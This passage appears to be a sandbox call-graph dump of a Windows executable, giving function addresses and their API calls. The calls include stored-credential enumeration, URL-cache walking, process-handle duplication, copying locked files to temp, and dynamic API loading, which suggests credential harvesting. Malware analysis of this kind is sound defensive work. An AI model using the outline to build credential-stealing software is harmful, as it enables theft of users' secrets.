40b2cc 27 API calls 38471->38478 38472->38358 38472->38359 38474 409d1f 6 API calls 38473->38474 38479 445e47 38474->38479 38480 40b2cc 27 API calls 38475->38480 38481 40b2cc 27 API calls 38476->38481 38483 445c53 38478->38483 38914 409b98 GetFileAttributesW 38479->38914 38485 445f73 38480->38485 38481->38456 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38489 409d1f 6 API calls 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38488 445e56 38488->38460 38496 445e83 memset 38488->38496 38493 445f87 38489->38493 38490->38456 38494 44578d 38491->38494 38495 445389 255 API calls 38492->38495 38918 409b98 GetFileAttributesW 38493->38918 38494->38464 38501 40b2cc 27 API calls 38494->38501 38495->38358 38500 40b2cc 27 API calls 38496->38500 38499->38375 38499->38444 38502 445eab 38500->38502 38503 4457a8 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 409d1f 6 API calls 38503->38505 38506 445ebf 38504->38506 38507 4457b8 38505->38507 38508 40ae18 9 API calls 38506->38508 38812 409b98 GetFileAttributesW 38507->38812 38518 445ef5 38508->38518 38510 4457c7 38510->38464 38511 4087b3 337 API calls 38510->38511 38511->38464 38512 40ae51 9 API calls 38512->38518 38513 445f5c 38514 40aebe FindClose 38513->38514 38514->38475 38515 40add4 2 API calls 38515->38518 38516 40b2cc 27 API calls 38516->38518 38517 409d1f 6 API calls 38517->38518 38518->38512 38518->38513 38518->38515 38518->38516 38518->38517 38520 445f3a 38518->38520 38916 409b98 GetFileAttributesW 38518->38916 38917 445093 23 API calls 38520->38917 38522->38319 38523->38322 38524->38319 38525->38314 38527 40c775 38526->38527 38919 40b1ab free free 38527->38919 38529 40c788 38920 40b1ab free free 38529->38920 38531 40c790 38921 40b1ab free free 38531->38921 38533 40c798 38534 40aa04 free 38533->38534 38535 40c7a0 38534->38535 38922 40c274 memset 38535->38922 38540 40a8ab 9 API calls 38541 40c7c3 38540->38541 38542 40a8ab 9 API calls 38541->38542 38543 40c7d0 38542->38543 38951 40c3c3 38543->38951 38547 40c7e5 38548 40c877 38547->38548 38549 40c86c 38547->38549 38974 40a706 wcslen memcpy 38547->38974 38976 40c634 49 API calls 38547->38976 38556 40bdb0 38548->38556 38977 4053fe 39 API calls 38549->38977 38552 40c813 _wcslwr 38975 40c634 49 API calls 38552->38975 38554 40c829 wcslen 38554->38547 39159 404363 38556->39159 38559 40bf5d 39179 40440c 38559->39179 38561 40bdee 38561->38559 38564 40b2cc 27 API calls 38561->38564 38562 40bddf CredEnumerateW 38562->38561 38565 40be02 wcslen 38564->38565 38565->38559 38572 40be1e 38565->38572 38566 40be26 wcsncmp 38566->38572 38569 40be7d memset 38570 40bea7 memcpy 38569->38570 38569->38572 38571 40bf11 wcschr 38570->38571 38570->38572 38571->38572 38572->38559 38572->38566 38572->38569 38572->38570 38572->38571 38573 40b2cc 27 API calls 38572->38573 38575 40bf43 LocalFree 38572->38575 39182 40bd5d 28 API calls 38572->39182 39183 404423 38572->39183 38574 40bef6 _wcsnicmp 38573->38574 38574->38571 38574->38572 38575->38572 38576 4135f7 39196 4135e0 38576->39196 38579 40b2cc 27 API calls 38580 41360d 38579->38580 38581 40a804 8 API calls 38580->38581 38582 413613 38581->38582 38583 41361b 38582->38583 38584 41363e 38582->38584 38586 40b273 27 API calls 38583->38586 38585 4135e0 FreeLibrary 38584->38585 38587 413643 38585->38587 38588 413625 GetProcAddress 38586->38588 38587->38349 38588->38584 38589 413648 38588->38589 38590 413658 38589->38590 38591 4135e0 FreeLibrary 38589->38591 38590->38349 38592 413666 38591->38592 38592->38349 39199 4449b9 38593->39199 38596 444c1f 38596->38329 38597 4449b9 42 API calls 38599 444b4b 38597->38599 38598 444c15 38600 4449b9 42 API calls 38598->38600 38599->38598 39220 444972 GetVersionExW 38599->39220 38600->38596 38602 444b99 memcmp 38607 444b8c 38602->38607 38603 444c0b 39224 444a85 42 API calls 38603->39224 38607->38602 38607->38603 39221 444aa5 42 API calls 38607->39221 39222 40a7a0 GetVersionExW 38607->39222 39223 444a85 42 API calls 38607->39223 38610 40399d 38609->38610 39225 403a16 38610->39225 38612 403a09 39239 40b1ab free free 38612->39239 38614 4039a3 38614->38612 38618 4039f4 38614->38618 39236 40a02c CreateFileW 38614->39236 38615 403a12 wcsrchr 38615->38336 38618->38612 38619 4099c6 2 API calls 38618->38619 38619->38612 38621 414c2e 14 API calls 38620->38621 38622 404048 38621->38622 38623 414c2e 14 API calls 38622->38623 38624 404056 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 404073 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40408e 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 4040a6 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040ba 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040cb 38633->38634 39266 40414f memset 38634->39266 38636 4040e0 38637 404140 38636->38637 38639 4040ec memset 38636->38639 38641 4099c6 2 API calls 38636->38641 38642 40a8ab 9 API calls 38636->38642 39280 40b1ab free free 38637->39280 38639->38636 38640 404148 38640->38396 38641->38636 38642->38636 39293 40a6e6 WideCharToMultiByte 38643->39293 38645 4087ed 39294 4095d9 memset 38645->39294 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39313 409b98 GetFileAttributesW 38668->39313 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39314 407fdf 75 API calls 38671->39314 39315 409b98 GetFileAttributesW 38672->39315 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39316 4082c7 198 API calls 38676->39316 39317 409b98 GetFileAttributesW 38677->39317 38680 408987 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39583 413f27 38700->39583 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39588 413959 38708->39588 39604 413ca4 38708->39604 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 403f4f 38726->38727 38728 403faf 38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39618 40b1ab free free 38728->39618 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39619 40b1ab free free 38750->39619 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39620 409cea 38759->39620 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39623 414bb0 wcscpy 38764->39623 38765->38763 38767 414cd2 39624 4145ac RegQueryValueExW 38767->39624 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 4453f3 38790->38791 38792 40add4 2 API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39625 409b98 GetFileAttributesW 38833->39625 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39626 40bb98 38836->39626 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39660 409a45 GetTempPathW 38842->39660 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39659 40a6e6 WideCharToMultiByte 38846->39659 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 38862 4251c4 136 API calls 38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39672 424f26 122 API calls 38863->39672 38864 40b8bd memset 39663 425413 17 API calls 38864->39663 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39673 40a734 MultiByteToWideChar 38880->39673 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39664 4253ef 16 API calls 38885->39664 39665 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39665 39666 4253af 17 API calls 38885->39666 39667 4253cf 17 API calls 38885->39667 39668 447280 memset 38885->39668 39669 447960 memset memcpy memcpy memcpy 38885->39669 39670 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39670 39671 447920 memcpy memcpy memcpy 38885->39671 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39765 409b98 GetFileAttributesW 38898->39765 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39766 409b98 GetFileAttributesW 38906->39766 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 38918->38499 38919->38529 38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39094 40a97a 38946->39094 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39099 40b1ab free free 38951->39099 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39100 40aa1d 38959->39100 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39102 405220 38971->39102 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 40c248 38986->38988 38987->38985 39003 40c084 21 API calls 38988->39003 38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39093 40b1ab free free 39020->39093 39021->39020 39022 40e540 39022->39017 39070 40e2ab 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 39048 40e13b CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39071 40e2c2 39070->39071 39072 406b90 11 API calls 39071->39072 39083 40e2d3 39072->39083 39073 40e4a0 39074 4069a3 ??3@YAXPAX free 39073->39074 39076 40e4ab 39074->39076 39075 406e8f 13 API calls 39075->39083 39076->39022 39077 406b53 SetFilePointerEx ReadFile 39077->39083 39078 40e489 39079 40aa04 free 39078->39079 39080 40e491 39079->39080 39080->39073 39082 40e497 free 39080->39082 39081 40dd50 _wcsicmp 39081->39083 39082->39073 39083->39073 39083->39075 39083->39077 39083->39078 39083->39081 39084 40dd50 _wcsicmp 39083->39084 39087 40742e 8 API calls 39083->39087 39088 40e3e0 memcpy 39083->39088 39089 40e3fb memcpy 39083->39089 39090 40e3b3 wcschr 39083->39090 39091 40e416 memcpy 39083->39091 39092 40e431 memcpy 39083->39092 39085 40e376 memset 39084->39085 39086 40aa29 6 API calls 39085->39086 39086->39083 39087->39083 39088->39083 39089->39083 39090->39083 39091->39083 39092->39083 39093->39008 39095 40a980 39094->39095 39096 40a995 _wcsicmp 39095->39096 39097 40a99c wcscmp 39095->39097 39098 40a8bb 39095->39098 39096->39095 39097->39095 39098->38949 39098->38950 39099->38953 39101 40aa23 RegEnumValueW 39100->39101 39101->38962 39101->38963 39103 405335 39102->39103 39104 40522a 39102->39104 39103->38547 39105 40b2cc 27 API calls 39104->39105 39106 405234 39105->39106 39107 40a804 8 API calls 39106->39107 39108 40523a 39107->39108 39147 40b273 39108->39147 39110 405248 _mbscpy _mbscat GetProcAddress 39111 40b273 27 API calls 39110->39111 39112 405279 39111->39112 39150 405211 GetProcAddress 39112->39150 39114 405282 39115 40b273 27 API calls 39114->39115 39116 40528f 39115->39116 39151 405211 GetProcAddress 39116->39151 39118 405298 39119 40b273 27 API calls 39118->39119 39120 4052a5 39119->39120 39152 405211 GetProcAddress 39120->39152 39122 4052ae 39123 40b273 27 API calls 39122->39123 39124 4052bb 39123->39124 39153 405211 GetProcAddress 39124->39153 39126 4052c4 39127 40b273 27 API calls 39126->39127 39128 4052d1 39127->39128 39154 405211 GetProcAddress 39128->39154 39130 4052da 39131 40b273 27 API calls 39130->39131 39132 4052e7 39131->39132 39155 405211 GetProcAddress 39132->39155 39134 4052f0 39135 40b273 27 API calls 39134->39135 39136 4052fd 39135->39136 39156 405211 GetProcAddress 39136->39156 39138 405306 39139 40b273 27 API calls 39138->39139 39140 405313 39139->39140 39157 405211 GetProcAddress 39140->39157 39142 40531c 39143 40b273 27 API calls 39142->39143 39144 405329 39143->39144 39158 405211 GetProcAddress 39144->39158 39146 405332 39146->39103 39148 40b58d 27 API calls 39147->39148 39149 40b18c 39148->39149 39149->39110 39150->39114 39151->39118 39152->39122 39153->39126 39154->39130 39155->39134 39156->39138 39157->39142 39158->39146 39160 40440c FreeLibrary 39159->39160 39161 40436d 39160->39161 39162 40a804 8 API calls 39161->39162 39163 404377 39162->39163 39164 404383 39163->39164 39165 404405 39163->39165 39166 40b273 27 API calls 39164->39166 39165->38559 39165->38561 39165->38562 39167 40438d GetProcAddress 39166->39167 39168 40b273 27 API calls 39167->39168 39169 4043a7 GetProcAddress 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043ba GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043ce GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043e2 GetProcAddress 39174->39175 39176 4043f1 39175->39176 39177 4043f7 39176->39177 39178 40440c FreeLibrary 39176->39178 39177->39165 39178->39165 39180 404413 FreeLibrary 39179->39180 39181 40441e 39179->39181 39180->39181 39181->38576 39182->38572 39184 40447e 39183->39184 39185 40442e 39183->39185 39184->38572 39186 40b2cc 27 API calls 39185->39186 39187 404438 39186->39187 39188 40a804 8 API calls 39187->39188 39189 40443e 39188->39189 39190 404445 39189->39190 39191 404467 39189->39191 39192 40b273 27 API calls 39190->39192 39191->39184 39194 404475 FreeLibrary 39191->39194 39193 40444f GetProcAddress 39192->39193 39193->39191 39195 404460 39193->39195 39194->39184 39195->39191 39197 4135f6 39196->39197 39198 4135eb FreeLibrary 39196->39198 39197->38579 39198->39197 39200 4449c4 39199->39200 39201 444a52 39199->39201 39202 40b2cc 27 API calls 39200->39202 39201->38596 39201->38597 39203 4449cb 39202->39203 39204 40a804 8 API calls 39203->39204 39205 4449d1 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4449dc GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449f3 GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 444a04 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 444a15 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a26 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a37 GetProcAddress 39216->39217 39218 40b273 27 API calls 39217->39218 39219 444a48 GetProcAddress 39218->39219 39219->39201 39220->38607 39221->38607 39222->38607 39223->38607 39224->38598 39226 403a29 39225->39226 39240 403bed memset memset 39226->39240 39228 403ae7 39253 40b1ab free free 39228->39253 39229 403a3f memset 39233 403a2f 39229->39233 39231 403aef 39231->38614 39232 409d1f 6 API calls 39232->39233 39233->39228 39233->39229 39233->39232 39234 409b98 GetFileAttributesW 39233->39234 39235 40a8d0 7 API calls 39233->39235 39234->39233 39235->39233 39237 40a051 GetFileTime CloseHandle 39236->39237 39238 4039ca CompareFileTime 39236->39238 39237->39238 39238->38614 39239->38615 39241 414c2e 14 API calls 39240->39241 39242 403c38 39241->39242 39243 409719 2 API calls 39242->39243 39244 403c3f wcscat 39243->39244 39245 414c2e 14 API calls 39244->39245 39246 403c61 39245->39246 39247 409719 2 API calls 39246->39247 39248 403c68 wcscat 39247->39248 39254 403af5 39248->39254 39251 403af5 20 API calls 39252 403c95 39251->39252 39252->39233 39253->39231 39255 403b02 39254->39255 39256 40ae18 9 API calls 39255->39256 39265 403b37 39256->39265 39257 403bdb 39259 40aebe FindClose 39257->39259 39258 40add4 wcscmp wcscmp 39258->39265 39260 403be6 39259->39260 39260->39251 39261 40a8d0 7 API calls 39261->39265 39262 40ae18 9 API calls 39262->39265 39263 40ae51 9 API calls 39263->39265 39264 40aebe FindClose 39264->39265 39265->39257 39265->39258 39265->39261 39265->39262 39265->39263 39265->39264 39267 409d1f 6 API calls 39266->39267 39268 404190 39267->39268 39281 409b98 GetFileAttributesW 39268->39281 39270 40419c 39271 4041a7 6 API calls 39270->39271 39272 40435c 39270->39272 39273 40424f 39271->39273 39272->38636 39273->39272 39275 40425e memset 39273->39275 39277 409d1f 6 API calls 39273->39277 39278 40a8ab 9 API calls 39273->39278 39282 414842 39273->39282 39275->39273 39276 404296 wcscpy 39275->39276 39276->39273 39277->39273 39279 4042b6 memset memset _snwprintf wcscpy 39278->39279 39279->39273 39280->38640 39281->39270 39285 41443e 39282->39285 39284 414866 39284->39273 39286 41444b 39285->39286 39287 414451 39286->39287 39288 4144a3 GetPrivateProfileStringW 39286->39288 39289 414491 39287->39289 39290 414455 wcschr 39287->39290 39288->39284 39292 414495 WritePrivateProfileStringW 39289->39292 39290->39289 39291 414463 _snwprintf 39290->39291 39291->39292 39292->39284 39293->38645 39295 40b2cc 27 API calls 39294->39295 39296 409615 39295->39296 39297 409d1f 6 API calls 39296->39297 39298 409625 39297->39298 39323 409b98 GetFileAttributesW 39298->39323 39300 409634 39301 409648 39300->39301 39324 4091b8 memset 39300->39324 39303 40b2cc 27 API calls 39301->39303 39305 408801 39301->39305 39304 40965d 39303->39304 39306 409d1f 6 API calls 39304->39306 39305->38648 39305->38692 39307 40966d 39306->39307 39376 409b98 GetFileAttributesW 39307->39376 39309 40967c 39309->39305 39310 409681 39309->39310 39377 409529 72 API calls 39310->39377 39312 409690 39312->39305 39313->38670 39314->38692 39315->38675 39316->38692 39317->38680 39323->39300 39378 40a6e6 WideCharToMultiByte 39324->39378 39326 409202 39379 444432 39326->39379 39329 40b273 27 API calls 39330 409236 39329->39330 39425 438552 39330->39425 39333 409383 39335 40b273 27 API calls 39333->39335 39337 409399 39335->39337 39336 409254 39338 40937b 39336->39338 39446 4253cf 17 API calls 39336->39446 39339 438552 133 API calls 39337->39339 39450 424f26 122 API calls 39338->39450 39358 4093a3 39339->39358 39342 409267 39447 4253cf 17 API calls 39342->39447 39343 4094ff 39454 443d90 39343->39454 39346 4251c4 136 API calls 39346->39358 39348 409507 39356 40951d 39348->39356 39474 408f2f 77 API calls 39348->39474 39350 4093df 39453 424f26 122 API calls 39350->39453 39352 4253cf 17 API calls 39352->39358 39356->39301 39358->39343 39358->39346 39358->39350 39358->39352 39360 4093e4 39358->39360 39451 4253af 17 API calls 39360->39451 39366 4093ed 39452 4253af 17 API calls 39366->39452 39369 4093f9 39369->39350 39370 409409 memcmp 39369->39370 39370->39350 39371 409421 memcmp 39370->39371 39372 4094a4 memcmp 39371->39372 39373 409435 39371->39373 39372->39350 39373->39350 39376->39309 39377->39312 39378->39326 39475 4438b5 39379->39475 39381 44444c 39387 409215 39381->39387 39489 415a6d 39381->39489 39384 444486 39386 4444b9 memcpy 39384->39386 39424 4444a4 39384->39424 39385 44469e 39385->39387 39389 443d90 110 API calls 39385->39389 39493 415258 39386->39493 39387->39329 39387->39356 39389->39387 39390 444524 39391 444541 39390->39391 39392 44452a 39390->39392 39496 444316 39391->39496 39530 416935 39392->39530 39396 444316 18 API calls 39397 444563 39396->39397 39398 444316 18 API calls 39397->39398 39399 44456f 39398->39399 39400 444316 18 API calls 39399->39400 39401 44457f 39400->39401 39401->39424 39510 432d4e 39401->39510 39543 4442e6 11 API calls 39424->39543 39544 438460 39425->39544 39427 409240 39427->39333 39428 4251c4 39427->39428 39556 424f07 39428->39556 39430 4251e4 39431 4251f7 39430->39431 39432 4251e8 39430->39432 39564 4250f8 39431->39564 39563 4446ea 11 API calls 39432->39563 39434 4251f2 39434->39336 39436 425209 39439 425249 39436->39439 39442 4250f8 126 API calls 39436->39442 39443 425287 39436->39443 39572 4384e9 134 API calls 39436->39572 39573 424f74 123 API calls 39436->39573 39439->39443 39574 424ff0 13 API calls 39439->39574 39442->39436 39576 415c7d 16 API calls 39443->39576 39446->39342 39450->39333 39451->39366 39452->39369 39453->39343 39455 443da3 39454->39455 39473 443db6 39454->39473 39577 41707a 11 API calls 39455->39577 39457 443da8 39458 443dac 39457->39458 39460 443dbc 39457->39460 39578 4446ea 11 API calls 39458->39578 39579 4300e8 memset memset memcpy 39460->39579 39473->39348 39474->39356 39476 4438d0 39475->39476 39482 4438c9 39475->39482 39477 415378 memcpy memcpy 39476->39477 39478 4438d5 39477->39478 39479 4154e2 10 API calls 39478->39479 39480 443906 39478->39480 39478->39482 39479->39480 39481 443970 memset 39480->39481 39480->39482 39484 44398b 39481->39484 39482->39381 39483 415700 10 API calls 39486 4439c0 39483->39486 39485 41975c 10 API calls 39484->39485 39487 4439a0 39484->39487 39485->39487 39486->39482 39488 418981 10 API calls 39486->39488 39487->39482 39487->39483 39488->39482 39490 415a77 39489->39490 39491 415a8d 39490->39491 39492 